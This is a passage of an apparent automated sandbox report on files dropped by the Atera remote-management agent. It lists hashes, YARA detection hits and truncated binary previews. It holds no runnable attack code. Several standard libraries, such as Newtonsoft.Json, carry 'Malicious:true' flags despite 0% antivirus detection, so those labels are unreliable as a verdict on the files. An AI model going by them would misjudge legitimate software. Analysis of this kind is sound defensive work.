                                                                                                                                                                                                                                        SSDEEP:768:avB4oeg/Po2Obb95bmrpeALHpZAgEpYinAMxCC8:ruQpbHbklAp7Hxx8
                                                                                                                                                                                                                                        MD5:3180C705182447F4BCC7CE8E2820B25D
                                                                                                                                                                                                                                        SHA1:AD6486557819A33D3F29B18D92B43B11707AAE6E
                                                                                                                                                                                                                                        SHA-256:5B536EDA4BFF1FDB5B1DB4987E66DA88C6C0E1D919777623344CD064D5C9BA22
                                                                                                                                                                                                                                        SHA-512:228149E1915D8375AA93A0AFF8C5A1D3417DF41B46F5A6D9A7052715DBB93E1E0A034A63F0FAAD98D4067BCFE86EDB5EB1DDF750C341607D33931526C784EB35
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0................. ........@.. ...................................`.................................p...O.......................0(.............8............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........B...s............................................................(....*.0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..(....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*.0..........s....%.o...+o....o...+&%.o...+o....o...+&%.o...+o....o...+&%.o...+o!...o...+&%.o...+o#...o...+&%.o...+o%...o...+&%.o...+o...+&%.o...+o(...o...+&%(*...%.(...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1782
                                                                                                                                                                                                                                        Entropy (8bit):5.026919218581437
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3rrb7h+1/gYo27RgdSagFsg+w3Sg+CjdgDt:7rn4cwCR
                                                                                                                                                                                                                                        MD5:13CFEB2261E4DAEAA3C06F7A60078F91
                                                                                                                                                                                                                                        SHA1:D76B6D07D8FEC75789025FBAB18048AD193B1462
                                                                                                                                                                                                                                        SHA-256:6BBDCC477F0C1EFBD0129AC7716F96CC2844103169AAEBFF03D4C8F5C54745D6
                                                                                                                                                                                                                                        SHA-512:F804155363FEB09427F7C8E968EAAA7DDA15F739769864A23C8A0FC9137151A03F02FB30B11F47A69DDCEFFF02BF933721C3757A3FB78C705D0537205BBD3A92
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                                                        Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhTLV:WFLV
                                                                                                                                                                                                                                        MD5:530F2E4E5E3DDA283DB3C78CC0C13297
                                                                                                                                                                                                                                        SHA1:CF60B778D32C9562B94411DA9DCD8FED2017AB84
                                                                                                                                                                                                                                        SHA-256:447163A4A3F1F10AFD9EC48F915085B3236F0FA7EDC9973C16925EDB5F6CF0CC
                                                                                                                                                                                                                                        SHA-512:DD4F7AF9A0F57707D1924BB504D3FC267B4898B909CF6E6ECD274BBC9B487A5CE5D8000E3FAD6EC0061E565C728455965C91F1B4E380227264AD2EE3E2990E28
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=6.0

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95792
                                                                                                                                                                                                                                        Entropy (8bit):6.184818983275012
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GQ7brNBoXFbuhpLHbTOgemUu7+n3uRw1FlQRd5JY4t5K56y0sDrUfvPrhZwLXF7X:GQ/iwLWgeW+neRw1Hyd/YCs56y0sXUfG
                                                                                                                                                                                                                                        MD5:23C8674C75D5944445BF1C035E4A4789
                                                                                                                                                                                                                                        SHA1:A1255CEDEAC9F9A04B50C7814CD7C61A50623A19
                                                                                                                                                                                                                                        SHA-256:D2043F878740F643BF91F3EF798DBB9747904A1D503AAC4ED2108131F663AB37
                                                                                                                                                                                                                                        SHA-512:52ABA8350A05E9E5A672CB04CE528CFC4DA009247B2BD8B63096AF9A37C1F352A4C2BD12B03973AA1E733551F94F542814E425223DEF2AA33B595AA2DC555A95
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Bd.........." ..0..D...........b... ........... ...............................{....`..................................b..O.......8............N..0(..........la............................................... ............... ..H............text....B... ...D.................. ..`.rsrc...8............F..............@..@.reloc...............L..............@..B.................b......H........j..l............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tQ...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):6.002764283325334
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ocNQW9Tbp/VgiZi7sT5gdBxYJMcTnbJkI+eD7HxSR:ojobJVgiHMcr5Da
                                                                                                                                                                                                                                        MD5:10961147A546FFCD8B7C19771BA70198
                                                                                                                                                                                                                                        SHA1:5B63EEA0B2E53DB81AFB146D469E899E1E67DACF
                                                                                                                                                                                                                                        SHA-256:95C53735107ADCC39E6C3268335B2AD434E2364A007CC97B2147AF3A6EE837F3
                                                                                                                                                                                                                                        SHA-512:9830450FF9E8D2E6B74D8D8938A18DFB1BA008249D389FB923D5AAA25B7F8F9E5BAD4CB3FC13100C5F53B0CCEDA4E9427E90F2B733EA9BE0FFAA5D5F165C815E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............" ..0..B..........Za... ........... ..............................~.....`..................................a..O....................L..0(..........``..8............................................ ............... ..H............text...`A... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................9a......H.......4i..,.............................................................(......}......}.......}.......}........o?...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po#...o....*..{....o2...r...p.(....(....o(...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.656654225594367
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:5Xh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl5XqQ:5Xh+tYmNyb8E9VF6IYinAM+oCaFXF
                                                                                                                                                                                                                                        MD5:96703E15C375B8A701C9D1F5BE8C4149
                                                                                                                                                                                                                                        SHA1:B058FA32FBDA52D70C1B966640B4824D5487ADC4
                                                                                                                                                                                                                                        SHA-256:3F830FA8F22EB09D59088705E26DCE964FB430722E91630B03EB15FCC48359A0
                                                                                                                                                                                                                                        SHA-512:3D7515BBFD018BCB24C69235A65F401BCF00D6932E412696FF31DC6EDE9436B2D4E5983450C9F88AF7B52D18949B4C1EFFEB9C3F94E85DCE57C4495F21D21A86
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ....................................@.................................",..O....@..(...............0(...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.410547751816252
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:KQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAM/:K9ML8LW/usybGYVE8mZw+89Wu1e7Hxas
                                                                                                                                                                                                                                        MD5:20FC2DB17D09554BBC37785B3644DFC3
                                                                                                                                                                                                                                        SHA1:AAC4CA54730DB46145748AB419CF6BE3B39D2A74
                                                                                                                                                                                                                                        SHA-256:4151D6C627A324D9F2991A4D98BB7544926DB41B3211EDC1B2085922B1D1FC46
                                                                                                                                                                                                                                        SHA-512:62F6711FD2861BEA0FC214882678CF7F98CB53E8AF858C46CCC1F5B1F2FF9C22DCBD3A184A9DE9AD2D2148F0B529426DE7F793A63A459D72D2DCB048DF4E40FD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&............." ..0.................. ........... ..............................&.....`.................................>...O.......4...............0(..........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................r.......H........E...s...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....P.........io ...&..i.X.P..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....P......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.13440642371392
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:hjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvr:h+e55LgIkTmyAAfTnMLvr
                                                                                                                                                                                                                                        MD5:A79C5395D945A1A369EA05D73B1170E4
                                                                                                                                                                                                                                        SHA1:937D030106FD7E88B61E4F4D1AC28A3B9FFA0AA4
                                                                                                                                                                                                                                        SHA-256:7580F72E7059A9DBCF41C94DC69ECCA0B3A983C010DE86B9A509A701163AFEC0
                                                                                                                                                                                                                                        SHA-512:176C719C2595A6A01041EC240D5341FAC5AB6137756FD70F71A1B5C5A6E9A923FB61760808840D439CDBAB70ADFAEE137B13600875E0BC3A209E501DB84C2AAD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`.......^....`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071525670553409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:Y1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQm:Y1n1p9LdRN39aQZUq3
                                                                                                                                                                                                                                        MD5:022108AD251A8942E295269CA824DE07
                                                                                                                                                                                                                                        SHA1:05CE96EB21FF69C5ACE572405A39936E594B7043
                                                                                                                                                                                                                                        SHA-256:353FC27D930C31219086C6D391B0502AC298F6084DFCB3EA423DD1DAB3BA1907
                                                                                                                                                                                                                                        SHA-512:49028D3C1C7C8FAE813F294577B97EB0C66F2D62DF880072AD59679460D55A6DEB1546DDF07A7353563910E21F4D53F5FCB4BD421887D7B75429083CA200C16E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ....................................`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960711597816388
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:yBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUc:yBjk38WuBcAbwoA/BkjSHXP36RMGl
                                                                                                                                                                                                                                        MD5:25879E885A79F4548FD878EAF4A82396
                                                                                                                                                                                                                                        SHA1:AFB8D0BBD5687D2FC19C7A3FB66EA3DF1886DB8C
                                                                                                                                                                                                                                        SHA-256:3DF7B27F8649C95C56F1F68A040F29FB28EFF6756F8BA78C480DFBB541E59E4A
                                                                                                                                                                                                                                        SHA-512:39EB28B89A077D37FC8076A364B26ADFD348F6DC891AC08FACCFB071D3806C32AC0A3A5D82E8D4DE01DF6F9E1C4271CCABFA8FF7248CF6886BEF8FE4BDE51B6F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......5.....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117274836584594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:NZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHU:fgo0WPVTXg0
                                                                                                                                                                                                                                        MD5:66DEBCC5962642D31706EA1B067288A3
                                                                                                                                                                                                                                        SHA1:FB6A76C0E5189F66FE1D0E192349077A45BF437F
                                                                                                                                                                                                                                        SHA-256:8CBC47B453EA20F1EEA3337981A1A975A16B68B27AA156831D2B4AD0B63EA980
                                                                                                                                                                                                                                        SHA-512:5C485C7D319BA9C019FBDCA48833D3628E6D9EA6F3AABFA47A519C363BA81D11265427FD470D5D665795B010A26E751DA404DBD70895E5EAFC83CBD50D83ED2B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.676829122620627
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqXLP:TuhMaVmzDC67EpYinAMxC5
                                                                                                                                                                                                                                        MD5:C3CBDF33261AA0BAA8C11B4D713BA911
                                                                                                                                                                                                                                        SHA1:A486A2CFA6EF16B9DD005C689C767E47BF18D5A6
                                                                                                                                                                                                                                        SHA-256:0BD8B6B5D401001A2003486077BC095A2138B42DE7A52B212BD7A4AAD72A9E35
                                                                                                                                                                                                                                        SHA-512:132600340186128C7B8EA40D77DE9E5359A52949E7EE815CF959E2000A6EE178FCE26A2AAA2EBC56A48318EEAD3038189567CD5D14F9E977780373649C83F41D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):97328
                                                                                                                                                                                                                                        Entropy (8bit):6.241615255803021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rNSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxhP:rN3OWMsQ56vd2s+KuYc9RTJrP
                                                                                                                                                                                                                                        MD5:259DAAE7BD386F6AE1C50DEF93F9A274
                                                                                                                                                                                                                                        SHA1:70E68497781C4E7B931B11E9EFE702ECCFBC3AF7
                                                                                                                                                                                                                                        SHA-256:859758492E07C9297C1C5A0A31FA30129C23D479F442ADE01F4A51F78A0DED08
                                                                                                                                                                                                                                        SHA-512:8D25CB5982E2D8A5EFA0056C120E1BD5AEC7E28DE4DEEC9BFA2BAEBFB0FABDC4A12369F901C8415CDD3402C9A0E8F8F338C1C5E3FEB1A2C0F45ED446AB80701B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0............" ..0..J...........h... ........... ..............................d.....`..................................g..O....................T..0(...........f..T............................................ ............... ..H............text...4I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......L...............<^.. ...\f........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.18032959054322
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:g3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnJ:S0qjCSRE+fw0kG71S
                                                                                                                                                                                                                                        MD5:CC3FFADF699BFB7F10A176AE306707E8
                                                                                                                                                                                                                                        SHA1:C0824E4E57FEBEF32E904E540BA369BB77ACD15A
                                                                                                                                                                                                                                        SHA-256:D48B4C4D3BED0F4662B98E557A0EDE24B6C3745E7BFFC114164A2FD33D947904
